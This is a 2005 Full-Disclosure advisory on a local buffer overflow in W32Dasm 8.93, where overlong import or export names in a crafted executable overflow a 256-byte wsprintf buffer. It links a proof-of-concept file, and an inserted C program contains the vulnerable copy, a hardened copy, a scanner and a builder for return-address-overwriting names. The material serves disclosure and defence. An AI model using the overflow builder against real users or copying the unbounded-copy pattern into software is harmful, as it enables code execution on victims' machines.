
| Subject: | [Full-Disclosure] Local buffer-overflow in W32Dasm 8.93 |
|---|---|
| Date: | Mon, 24 Jan 2005 21:49:11 +0000 |
#######################################################################
Luigi Auriemma
Application: W32Dasm
(was http://www.expage.com/page/w32dasm)
Versions: <= 8.93 (8.94???)
Platforms: Windows
Bug: buffer-overflow
Exploitation: local
Date: 24 Jan 2005
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: http://aluigi.altervista.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
W32Dasm is a well-known and popular disassembler/debugger developed by URSoft.
It has tons of functions and, although it has not been supported for a long
time, it is still widely used by a lot of people.
#######################################################################
======
2) Bug
======
The program uses the wsprintf() function to copy the names of the
imported/exported functions of the analyzed file into a buffer of only
256 bytes. wsprintf() does not bound the destination, so a function name
longer than that overflows the buffer, and an attacker who supplies a
crafted executable can execute malicious code when it is opened.
#######################################################################
===========
3) The Code
===========
Exploiting the bug is very simple: all you need is to take an executable
and modify the name of one of its imported or exported functions so that
it is longer than the 256-byte buffer.
I have written a very simple proof-of-concept that overwrites the
return address with 0xdeadc0de:
http://aluigi.altervista.org/poc/w32dasmbof.disasm_me
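As an added example (not part of this advisory and not W32Dasm's own code), the
following C program puts the pattern described in sections 2 and 3 side by side:
the unbounded formatted copy into a 256-byte buffer, a bounded copy with an
explicit truncation check, a scanner that flags import/export names that would
overflow such a buffer, and a builder for a name of the shape the PoC uses
(padding followed by 0xdeadc0de in little-endian byte order). sprintf() stands
in for the Win32 wsprintf() so the file builds on any platform; the sample
names and the padding length are constructed assumptions, because the advisory
states neither the distance from the buffer to the saved return address nor
the layout of the actual PoC file.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The fixed-size destination the advisory describes. */
#define NAME_BUF_SIZE 256

/* Vulnerable pattern: an unbounded formatted copy into a 256-byte stack
 * buffer. sprintf() stands in for wsprintf(); neither knows the size of the
 * destination. Only call this with a name shorter than NAME_BUF_SIZE: a
 * longer one overwrites the stack frame, which is the bug. */
size_t vulnerable_copy(const char *name)
{
    char buf[NAME_BUF_SIZE];
    sprintf(buf, "%s", name);
    return strlen(buf);
}

/* Does a NUL-terminated name fit, terminator included, in bufsz bytes? */
int name_fits(const char *name, size_t bufsz)
{
    return strlen(name) + 1 <= bufsz;
}

/* Hardened copy: bounded write plus a truncation check. Returns 0 on
 * success and -1 if the name did not fit, in which case dst is emptied
 * instead of holding a silently truncated name. */
int hardened_copy(char *dst, size_t dstsz, const char *name)
{
    int n = snprintf(dst, dstsz, "%s", name);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Scanner: count the import/export names that would overflow a buffer of
 * bufsz bytes, i.e. the names that trigger the bug when the file is loaded. */
size_t count_overlong_names(const char *const *names, size_t n, size_t bufsz)
{
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (!name_fits(names[i], bufsz))
            bad++;
    return bad;
}

/* Build a name of the shape the PoC uses: pad filler bytes followed by a
 * 32-bit value in little-endian order, meant to land on the saved return
 * address. pad is the caller's assumption; the advisory does not give the
 * distance from the buffer to the return address. Returns NULL if the value
 * contains a zero byte, because PE import/export names are NUL-terminated
 * strings and the name would be cut short there. The caller frees the result. */
char *build_overflow_name(size_t pad, uint32_t value)
{
    unsigned char le[4];
    for (int i = 0; i < 4; i++) {
        le[i] = (unsigned char)(value >> (8 * i));
        if (le[i] == 0)
            return NULL;
    }
    char *name = malloc(pad + 4 + 1);
    if (name == NULL)
        return NULL;
    memset(name, 'A', pad);
    memcpy(name + pad, le, 4);
    name[pad + 4] = '\0';
    return name;
}

int main(void)
{
    /* Constructed sample: two ordinary import names and one 300-byte name. */
    char longname[301];
    memset(longname, 'A', 300);
    longname[300] = '\0';
    const char *names[] = { "GetProcAddress", "ExitProcess", longname };

    printf("overlong names in sample table: %zu\n",
           count_overlong_names(names, 3, NAME_BUF_SIZE));

    char dst[NAME_BUF_SIZE];
    printf("hardened copy of 300-byte name: %d\n",
           hardened_copy(dst, sizeof dst, longname));
    printf("vulnerable copy of a short name: %zu bytes\n",
           vulnerable_copy("ExitProcess"));

    /* Padding of 268 bytes is an illustrative assumption, not the PoC's value. */
    char *poc = build_overflow_name(NAME_BUF_SIZE + 12, 0xdeadc0deu);
    if (poc != NULL) {
        size_t len = strlen(poc);
        printf("poc-style name: %zu bytes, tail %02x %02x %02x %02x\n", len,
               (unsigned char)poc[len - 4], (unsigned char)poc[len - 3],
               (unsigned char)poc[len - 2], (unsigned char)poc[len - 1]);
        free(poc);
    }
    return 0;
}
```

Two points the program makes explicit: the 0xdeadc0de value happens to contain no
zero byte, which is why it survives as a C string in a name table, and, since no
fix exists, the scanner is the check to run over a binary's import/export names
before opening it in W32Dasm.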
#######################################################################
======
4) Fix
======
No fix.
This program is no longer supported, so the only mitigation is not to
open untrusted executables with it.
#######################################################################
---
Luigi Auriemma
http://aluigi.altervista.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html